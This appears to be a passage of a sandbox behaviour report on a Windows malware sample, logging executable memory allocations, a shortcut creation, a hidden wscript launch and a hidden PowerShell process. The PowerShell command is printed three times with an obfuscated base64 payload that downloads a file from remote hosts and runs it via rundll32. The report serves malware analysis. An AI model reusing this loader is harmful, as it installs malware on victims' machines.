NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bbb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bbd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bbe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bbf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABPAHYAZQByAHQAYQBzAGsAcwBSAGUAcABlAHQAYQB0AGkAdgBlAGwAeQAgAD0AIAAiAEEAZABpAHAAbwBzAGUAbgBlAHMAcwBBAGQAaQBhAGIAYQB0ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJABDAGgAYQByAGEAYwB0AGUAcgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACIAUwBoAGUAYgBhAG4AZwBzACIAOwAkAGgAZQB5AGQAYQB5AFAAbABpAG0AcwBvAGwAIAA9ACAAMQA3ADIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AbwBnAHIAYQBwAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAEEAQQB2AEEARwBZAEEAYQBnAEIATwBBAEUAawBBAFYAQQBCAHcAQQBHAE0AQQBMAHcAQQA1AEEARQAwAEEAUgB3AEIANgBBAEcAbwBBAHUATgBtAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBNAEEAQQAxAEEASABFAEEAYwBBAEIAYQBBAEUAawBBAE4AZwBCAEcAQQBFADAAQQBTAGcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABoAGkAYQBsAGEAZQAgAGkAbgAgACQAbQBhAGMAcgBvAHMAZQBpAHMAbQBvAGcAcgBhAHAAaAAgAC0AcwBwAGwAaQB0ACAAIgB1AE4AbQBoACIAKQAgAHsAJABuAG8AbgBmAGEAYwBlAHQAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAbgBlAGUAZABtAGUAbgB0AEIAZQBjAHUAZABnAGUAbABlAGQAIgA7ACQAQQBuAHQAaABvAGcAcgBhAHAAaAB5AFIAZQBmAHIAYQBtAGUAZAAgAD0AIAA0ADYANgA7AHQAcgB5ACAAewAkAFMAcAB1AHQAdABlAHIAZQBkAE0AZQB0AGEAYgBvAGwAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABBAEEAeABSAEsASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBADQAQQBDADQAQQBPAFEAQQA0AEEAQQA9AD0AIgA7ACQAdgBpAGcAZwBsAGUAIAA9ACAANAA3ADgAOwAkAEUAcABoAHIAYQBpAG0AaQB0AGkAYwAgAD0AIAAiAFIAZQBjAG8AZwBuAGkAegBpAG4AZwBQAG8AbABlAGEAeABpAG4AZwAiADsAJABVAG4AaABvAGUAZABUAGUAcgBjAGUAbABlAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABoAGkAYQBsAGEAZQApACkAOwBpAHcAcgAgACQAVQBuAGgAbwBlAGQAVABlAHIAYwBlAGwAZQB0ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABoAG8AbABlAGQAQwBvAG4AYwBlAHAAdAB1AGEAbABpAHoAZQBkAC4AdAByAGEAZABlAHMAcABlAHIAcwBvAG4AVQBuAHIAaQBmAGYAbABlAGQAOwAkAEkAbQBwAGUAdAByAGEAdABpAG4AZwAgAD0AIAA1ADMAOAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB0AGgAbwBsAGUAZABDAG8AbgBjAGUAcAB0AHUAYQBsAGkAegBlAGQALgB0AHIAYQBkAGUAcwBwAGUAcgBzAG8AbgBVAG4AcgBpAGYAZgBsAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADYAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBkAEEAQgBvAEEARwA4AEEAYgBBAEIAbABBAEcAUQBBAFEAdwBCAHYAQQBHADQAQQBZAHcAQgBsAEEASABBAEEAZABBAEIAMQBBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAeQBBAEcARQBBAFoAQQBCAGwAQQBIAE0AQQBjAEEAQgBsAEEASABJAEEAYwB3AEIAdgBBAEcANABBAFYAUQBCAHUAQQBIAEkAQQBhAFEAQgBtAEEARwBZAEEAYgBBAEIAbABBAEcAUQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAGcAcgBhAG4AZwBlAHIAaQBzAGUAcgBBAHQAaABlAG8AbABvAGcAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB4AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAeQBBAEEAPQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBZAHcAQgAwAEEASABVAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAFEAQQBkAGcAQQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABZAEEATgBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQAxAEEAQQA9AD0AVAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGIAdwBCAHYAQQBHAHcAQQBiAFEAQgBoAEEARwBzAEEAWgBRAEIAeQBBAEUATQBBAGEAQQBCADUAQQBHAHcAQQBiAHcAQgBqAEEARwBFAEEAZABRAEIAcwBBAEgAawBBAEwAZwBCAHUAQQBIAEkAQQBkAHcAQQA9ACIAOwAkAFMAdABhAHQAdQBhAHIAaQBzAG0AIAA9ACAAIgBQAHIAZQBmAHUAbABnAGUAbgB0AE8AcwB0AGUAbwBtAGEAdABvAGkAZAAiADsAYgByAGUAYQBrADsATgBlAHgAdABKAFMAOwB9AE4AZQB4AHQASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABiAGUAYQByAHcAYQByAGQAIAA9ACAANAAwADYAOwB9AH0AJABzAG4AYQBwAHAAaQBzAGgATABlAGgAcgBtAGEAbgAgAD0AIAA3ADMAOAA7AA=="

cmdline

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABPAHYAZQByAHQAYQBzAGsAcwBSAGUAcABlAHQAYQB0AGkAdgBlAGwAeQAgAD0AIAAiAEEAZABpAHAAbwBzAGUAbgBlAHMAcwBBAGQAaQBhAGIAYQB0ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJABDAGgAYQByAGEAYwB0AGUAcgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACIAUwBoAGUAYgBhAG4AZwBzACIAOwAkAGgAZQB5AGQAYQB5AFAAbABpAG0AcwBvAGwAIAA9ACAAMQA3ADIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AbwBnAHIAYQBwAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAEEAQQB2AEEARwBZAEEAYQBnAEIATwBBAEUAawBBAFYAQQBCAHcAQQBHAE0AQQBMAHcAQQA1AEEARQAwAEEAUgB3AEIANgBBAEcAbwBBAHUATgBtAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBNAEEAQQAxAEEASABFAEEAYwBBAEIAYQBBAEUAawBBAE4AZwBCAEcAQQBFADAAQQBTAGcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABoAGkAYQBsAGEAZQAgAGkAbgAgACQAbQBhAGMAcgBvAHMAZQBpAHMAbQBvAGcAcgBhAHAAaAAgAC0AcwBwAGwAaQB0ACAAIgB1AE4AbQBoACIAKQAgAHsAJABuAG8AbgBmAGEAYwBlAHQAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAbgBlAGUAZABtAGUAbgB0AEIAZQBjAHUAZABnAGUAbABlAGQAIgA7ACQAQQBuAHQAaABvAGcAcgBhAHAAaAB5AFIAZQBmAHIAYQBtAGUAZAAgAD0AIAA0ADYANgA7AHQAcgB5ACAAewAkAFMAcAB1AHQAdABlAHIAZQBkAE0AZQB0AGEAYgBvAGwAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABBAEEAeABSAEsASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBADQAQQBDADQAQQBPAFEAQQA0AEEAQQA9AD0AIgA7ACQAdgBpAGcAZwBsAGUAIAA9ACAANAA3ADgAOwAkAEUAcABoAHIAYQBpAG0AaQB0AGkAYwAgAD0AIAAiAFIAZQBjAG8AZwBuAGkAegBpAG4AZwBQAG8AbABlAGEAeABpAG4AZwAiADsAJABVAG4AaABvAGUAZABUAGUAcgBjAGUAbABlAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABoAGkAYQBsAGEAZQApACkAOwBpAHcAcgAgACQAVQBuAGgAbwBlAGQAVABlAHIAYwBlAGwAZQB0ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABoAG8AbABlAGQAQwBvAG4AYwBlAHAAdAB1AGEAbABpAHoAZQBkAC4AdAByAGEAZABlAHMAcABlAHIAcwBvAG4AVQBuAHIAaQBmAGYAbABlAGQAOwAkAEkAbQBwAGUAdAByAGEAdABpAG4AZwAgAD0AIAA1ADMAOAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB0AGgAbwBsAGUAZABDAG8AbgBjAGUAcAB0AHUAYQBsAGkAegBlAGQALgB0AHIAYQBkAGUAcwBwAGUAcgBzAG8AbgBVAG4AcgBpAGYAZgBsAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADYAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBkAEEAQgBvAEEARwA4AEEAYgBBAEIAbABBAEcAUQBBAFEAdwBCAHYAQQBHADQAQQBZAHcAQgBsAEEASABBAEEAZABBAEIAMQBBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAeQBBAEcARQBBAFoAQQBCAGwAQQBIAE0AQQBjAEEAQgBsAEEASABJAEEAYwB3AEIAdgBBAEcANABBAFYAUQBCAHUAQQBIAEkAQQBhAFEAQgBtAEEARwBZAEEAYgBBAEIAbABBAEcAUQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAGcAcgBhAG4AZwBlAHIAaQBzAGUAcgBBAHQAaABlAG8AbABvAGcAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB4AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAeQBBAEEAPQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBZAHcAQgAwAEEASABVAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAFEAQQBkAGcAQQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABZAEEATgBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQAxAEEAQQA9AD0AVAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGIAdwBCAHYAQQBHAHcAQQBiAFEAQgBoAEEARwBzAEEAWgBRAEIAeQBBAEUATQBBAGEAQQBCADUAQQBHAHcAQQBiAHcAQgBqAEEARwBFAEEAZABRAEIAcwBBAEgAawBBAEwAZwBCAHUAQQBIAEkAQQBkAHcAQQA9ACIAOwAkAFMAdABhAHQAdQBhAHIAaQBzAG0AIAA9ACAAIgBQAHIAZQBmAHUAbABnAGUAbgB0AE8AcwB0AGUAbwBtAGEAdABvAGkAZAAiADsAYgByAGUAYQBrADsATgBlAHgAdABKAFMAOwB9AE4AZQB4AHQASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABiAGUAYQByAHcAYQByAGQAIAA9ACAANAAwADYAOwB9AH0AJABzAG4AYQBwAHAAaQBzAGgATABlAGgAcgBtAGEAbgAgAD0AIAA3ADMAOAA7AA=="

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 16, 2023, 10:33 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Local\Temp\Guabsl.js" devolvementNonhectic SemicoagulatedTogawise Menhir filepath: wscript	1	1
CreateProcessInternalW May 16, 2023, 10:33 a.m.	thread_identifier: 2812 thread_handle: 0x00000300 process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABPAHYAZQByAHQAYQBzAGsAcwBSAGUAcABlAHQAYQB0AGkAdgBlAGwAeQAgAD0AIAAiAEEAZABpAHAAbwBzAGUAbgBlAHMAcwBBAGQAaQBhAGIAYQB0ACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJABDAGgAYQByAGEAYwB0AGUAcgBvAGwAbwBnAGkAYwBhAGwAbAB5ACAAPQAgACIAUwBoAGUAYgBhAG4AZwBzACIAOwAkAGgAZQB5AGQAYQB5AFAAbABpAG0AcwBvAGwAIAA9ACAAMQA3ADIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AbwBnAHIAYQBwAGgAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAEEAQQB2AEEARwBZAEEAYQBnAEIATwBBAEUAawBBAFYAQQBCAHcAQQBHAE0AQQBMAHcAQQA1AEEARQAwAEEAUgB3AEIANgBBAEcAbwBBAHUATgBtAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBNAEEAQQAxAEEASABFAEEAYwBBAEIAYQBBAEUAawBBAE4AZwBCAEcAQQBFADAAQQBTAGcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABoAGkAYQBsAGEAZQAgAGkAbgAgACQAbQBhAGMAcgBvAHMAZQBpAHMAbQBvAGcAcgBhAHAAaAAgAC0AcwBwAGwAaQB0ACAAIgB1AE4AbQBoACIAKQAgAHsAJABuAG8AbgBmAGEAYwBlAHQAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAbgBlAGUAZABtAGUAbgB0AEIAZQBjAHUAZABnAGUAbABlAGQAIgA7ACQAQQBuAHQAaABvAGcAcgBhAHAAaAB5AFIAZQBmAHIAYQBtAGUAZAAgAD0AIAA0ADYANgA7AHQAcgB5ACAAewAkAFMAcAB1AHQAdABlAHIAZQBkAE0AZQB0AGEAYgBvAGwAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQAwAEEARABBAEEAeABSAEsASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBADQAQQBDADQAQQBPAFEAQQA0AEEAQQA9AD0AIgA7ACQAdgBpAGcAZwBsAGUAIAA9ACAANAA3ADgAOwAkAEUAcABoAHIAYQBpAG0AaQB0AGkAYwAgAD0AIAAiAFIAZQBjAG8AZwBuAGkAegBpAG4AZwBQAG8AbABlAGEAeABpAG4AZwAiADsAJABVAG4AaABvAGUAZABUAGUAcgBjAGUAbABlAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUABoAGkAYQBsAGEAZQApACkAOwBpAHcAcgAgACQAVQBuAGgAbwBlAGQAVABlAHIAYwBlAGwAZQB0ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdABoAG8AbABlAGQAQwBvAG4AYwBlAHAAdAB1AGEAbABpAHoAZQBkAC4AdAByAGEAZABlAHMAcABlAHIAcwBvAG4AVQBuAHIAaQBmAGYAbABlAGQAOwAkAEkAbQBwAGUAdAByAGEAdABpAG4AZwAgAD0AIAA1ADMAOAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB0AGgAbwBsAGUAZABDAG8AbgBjAGUAcAB0AHUAYQBsAGkAegBlAGQALgB0AHIAYQBkAGUAcwBwAGUAcgBzAG8AbgBVAG4AcgBpAGYAZgBsAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADYAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBkAEEAQgBvAEEARwA4AEEAYgBBAEIAbABBAEcAUQBBAFEAdwBCAHYAQQBHADQAQQBZAHcAQgBsAEEASABBAEEAZABBAEIAMQBBAEcARQBBAGIAQQBCAHAAQQBIAG8AQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAeQBBAEcARQBBAFoAQQBCAGwAQQBIAE0AQQBjAEEAQgBsAEEASABJAEEAYwB3AEIAdgBBAEcANABBAFYAUQBCAHUAQQBIAEkAQQBhAFEAQgBtAEEARwBZAEEAYgBBAEIAbABBAEcAUQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAGcAcgBhAG4AZwBlAHIAaQBzAGUAcgBBAHQAaABlAG8AbABvAGcAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB4AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAeQBBAEEAPQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBZAHcAQgAwAEEASABVAEEAWQBRAEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBIAFEAQQBkAGcAQQA9AFQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABZAEEATgBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQAxAEEAQQA9AD0AVAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGIAdwBCAHYAQQBHAHcAQQBiAFEAQgBoAEEARwBzAEEAWgBRAEIAeQBBAEUATQBBAGEAQQBCADUAQQBHAHcAQQBiAHcAQgBqAEEARwBFAEEAZABRAEIAcwBBAEgAawBBAEwAZwBCAHUAQQBIAEkAQQBkAHcAQQA9ACIAOwAkAFMAdABhAHQAdQBhAHIAaQBzAG0AIAA9ACAAIgBQAHIAZQBmAHUAbABnAGUAbgB0AE8AcwB0AGUAbwBtAGEAdABvAGkAZAAiADsAYgByAGUAYQBrADsATgBlAHgAdABKAFMAOwB9AE4AZQB4AHQASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABiAGUAYQByAHcAYQByAGQAIAA9ACAANAAwADYAOwB9AH0AJABzAG4AYQBwAHAAaQBzAGgATABlAGgAcgBtAGEAbgAgAD0AIAA3ADMAOAA7AA==" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 